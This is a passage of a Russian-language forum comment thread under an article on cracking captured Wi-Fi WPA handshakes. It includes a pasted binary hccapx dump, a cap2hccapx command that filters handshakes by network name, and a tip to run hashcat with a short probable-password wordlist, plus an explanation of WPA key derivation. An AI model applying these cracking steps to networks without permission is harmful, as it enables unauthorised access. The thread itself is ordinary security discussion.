        s??=?;?N?![HsX?!??z???eB#n4??0???HCPX?Tra Mi??-©????w?2?gwuG??g?KR?})?tCCgwO??????(??s??=?;?N?![HsX?!??z???eB#o4??yu
        s??=?;?N?![HsX?!??z???eB#o4??0???HCPX?Tra Mi??-©????w?2?gwuG??g?KR?})?tCCgwO??????(??s??=?;?N?![HsX?!??z???eB#o4??yu
        s??=?;?N?![HsX?!??z???eB#o4??0???HCPX?Tra Mi?	?d??ES3?"4?????w?2?gwuG??g?KR?})?tCCgwO??????(??s??=?;?N?![HsX?!??z???eB#p4??yu
        s??=?;?N?![HsX?!??z???eB#p4??0???HCPX?Tra Mi?T???+??[????y???w?2?gwuG??g?KR?})?tCCgwO??????(??s??=?;?N?![HsX?!??z???eB#q4??yu
        s??=?;?N?![HsX?!??z???eB#q4??0???HCPX?Tra Miv?_??A?3??P???q/???w?2?gwuG??g?KR?})?tCCgwO??????(??s??=?;?N?![HsX?!??z???eB#r4??yu
        s??=?;?N?![HsX?!??z???eB#r4??0???HCPX?Tra Mi?????O??#]$D???w?2?gwuG??g?KR?})?tCCgwO??????(??s??=?;?N?![HsX?!??z???eB#s4??yu
        s??=?;?N?![HsX?!??z???eB#s4??0??????????????HCPX?Tra Mi????
                                                                   ?5?:?k?????w?2?gwuG??g?KR?})?tCCgwO??????(??s??=?;?N?![HsX?!??z???eB#v4??yu
        s??=?;?N?![HsX?!??z???eB#v4??0???HCPX?Tra Mib??uO??veU???\???w?2?gwuG??g?KR?})?tCCgwO??????(??s??=?;?N?![HsX?!??z???eB#w4??yu
        

        Какая-то ерунда. Как можно их выдернуть? Могу просто взять первые 2 строчки из файла?


        1. mobilz Автор
          30.01.2018 10:21
          +1

          hccapx бинарник вроде, так просто не получится. можно на уровне cap2hccapx это сделать

          usage: ./cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid]

          Т.е. в вашем случае

          ./cap2hccapx.bin /var/tmp/\(null\)_ch11_2018-01-29_18.31.02.pcap /var/tmp/home-HomeBB.hccapx HomeBB

          для поиска хендшейков только к конкретной сети. Но я бы начал с просто короткого словаря. Например этого:
          github.com/berzerk0/Probable-Wordlists/blob/master/Real-Passwords/WPA-Length/Top1378-probable-WPA.txt
          кладёте его вместо rockyou и повторяете hashcat по всем сетям. По этому словарю перебор должен пройти намного быстрее.


          1. ildarchegg
            30.01.2018 13:27

            спасибо, буду пробовать.


  1. jia3ep
    30.01.2018 10:27
    +1

    Если совсем грубо, рукопожатия представляют собой обычный хэш типа md5.
    Это правда совсем грубо. Ключ там получается путем 4096 раундов SHA1. Если быть точным, то формула такая: Key = PBKDF2(HMAC?SHA1, passphrase, ssid, 4096, 256)

    Кстати, можно заметить, что замешивается название точки, поэтому при уникальном названии предвычисления не помогают. И это аргумент за то, чтобы менять название точки на свое.


    1. mobilz Автор
      30.01.2018 10:42

      тут идея намекнуть, что это хэш, а если и такое слово новое — может хоть за «md5» глаз зацепится ) поэтому и «совсем грубо» ) за точную формулу спасибо ) добавил в статью